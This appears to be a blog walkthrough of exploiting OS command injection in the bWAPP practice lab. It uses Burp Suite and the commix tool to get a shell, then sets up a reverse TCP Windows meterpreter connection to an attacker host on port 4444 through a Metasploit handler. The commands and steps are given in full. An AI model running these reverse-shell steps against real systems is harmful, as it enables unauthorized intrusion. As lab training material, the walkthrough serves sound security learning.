Command
injection is an attack in which the goal is execution of arbitrary commands on
the host operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied data
(forms, cookies, HTTP headers etc.) to a system shell. In this attack, the
attacker-supplied operating system commands are usually executed with the privileges
of the vulnerable application. Command injection attacks are possible largely
due to insufficient input validation.
This
attack differs from Code Injection, in that code injection allows the
attacker to add his own code that is then executed by the application.
In Code Injection, the attacker extends the default functionality of the
application without the necessity of executing system commands. Source:
Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp suite, Commix tool
You
need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the
link web Pentest lab setup using bwapp here.
Our task is to get meterpreter shell
through os command injection-Blind attack using bWAPP
Start
service Apache and Mysql in Xampp or Wamp server. Let’s
open the local host address in browser as I am using
192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug
respectively.
My
task is to bypass all three security level in bWAPP through os command
injection.
Let start!!!!
Set
the security level low, from list box choose your bug select os command injection-Blind now and
click on hack.
Type
your IP in the text field and just after that start the burp suite in kali
Linux. Don’t forget to set proxy in your browser while using the burp suite.
To
capture the cookie of bWAPP click on proxy
tag then click to inception is on button,
come back to bWAPP and now click to PING button.
Look
at image you will find that I have got the details.
Open the terminal in kali Linux and type the commix
command.
From intercepted data under burp suite copy the
referrer, cookie and target and use this in the following command
commix
--url="http://192.168.1.101:81/bWAPP/commandi_blind.php"
--data="target=target=192.168.1.101&form=submit"
--cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O;
security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"
This
command will execute the commix tool in terminal which automatically perform
command injection attack using url and cookie information in bWAPP.
Commix
found the target seems injectable via blind injection techniques and will
further ask for pseudo terminal.
Type
‘y’ to resumed the classic injection point and to pseudo terminal shell
Here
we got the commix os shell but our aim is meterpreter shell for that we need to
type following commands.
commix(os_shell)
> reverse_tcp
commix(reverse_tcp)
> set LHOST 192.168.1.101
commix(reverse_tcp)
> set LPORT 4444
Option asks by
commix to set backdoor for connection Type '2' for other reverse TCP shells.
commix(reverse_tcp)
> 2
Option asks by commix to set payload Type '7' to use a Windows
meterpreter reverse TCP shell.
commix(reverse_tcp)
>7
Option asks by commix to set powershell injection attack Type
'2' to use TrustedSec's Magic Unicorn.
commix(reverse_tcp)
>2
Above
step will geneterate a shellcode marked above
in the image copy the whole shellcode “msfconsole
-r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.
Once
metasploit framework gets loaded and starts the payload handler; come back to
your previous terminal and press enter.
As it is mention in image.
Luckly!! We succeeded in our task we have
got meterpreter shell.
Meterpreter>sysinfo
Same
task we going to perform with same process but with another type of
vulnerability. Set the security level low, from list box choose your bug select
os command injection now and click
on hack.
Type
your IP in the DNS lookup field and just after that start the burp suite and
set manual proxy of browser. Click on proxy
tag then click to inception is on button,
come back to bWAPP and now click to Lookup.
Open the terminal in kali Linux and type the commix
command.
commix
--url="http://192.168.1.101:81/bWAPP/commandi.php" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O;
security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7"
--data="target=192.168.1.101&form=submit"
Type
‘y’ to resumed the classic injection point and to pseudo terminal shell
Here
we got the commix os shell but our aim is meterpreter shell for that we need to
type following commands.
commix(os_shell)
> reverse_tcp
commix(reverse_tcp)
> set LHOST 192.168.1.101
commix(reverse_tcp)
> set LPORT 4444
Option asks by
commix to set backdoor for connection Type '2' for other reverse TCP shells.
commix(reverse_tcp)
> 2
Option asks by commix to set payload Type '7' to use a
Windows meterpreter reverse TCP shell.
commix(reverse_tcp)
>7
Option asks by commix to set powershell injection attack Type
'2' to use TrustedSec's Magic Unicorn.
commix(reverse_tcp)
>2
Above step will geneterate a shellcode marked above in the image copy the whole
shellcode “msfconsole -r
/usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.
Once
metasploit framework gets loaded and starts the payload handler come; back to
your previous terminal and press enter.
As it is mention in image.
Luckly!! Again we succeeded in our task we have got
meterpreter shell.
Meterpreter>sysinfo
0 comments:
Post a Comment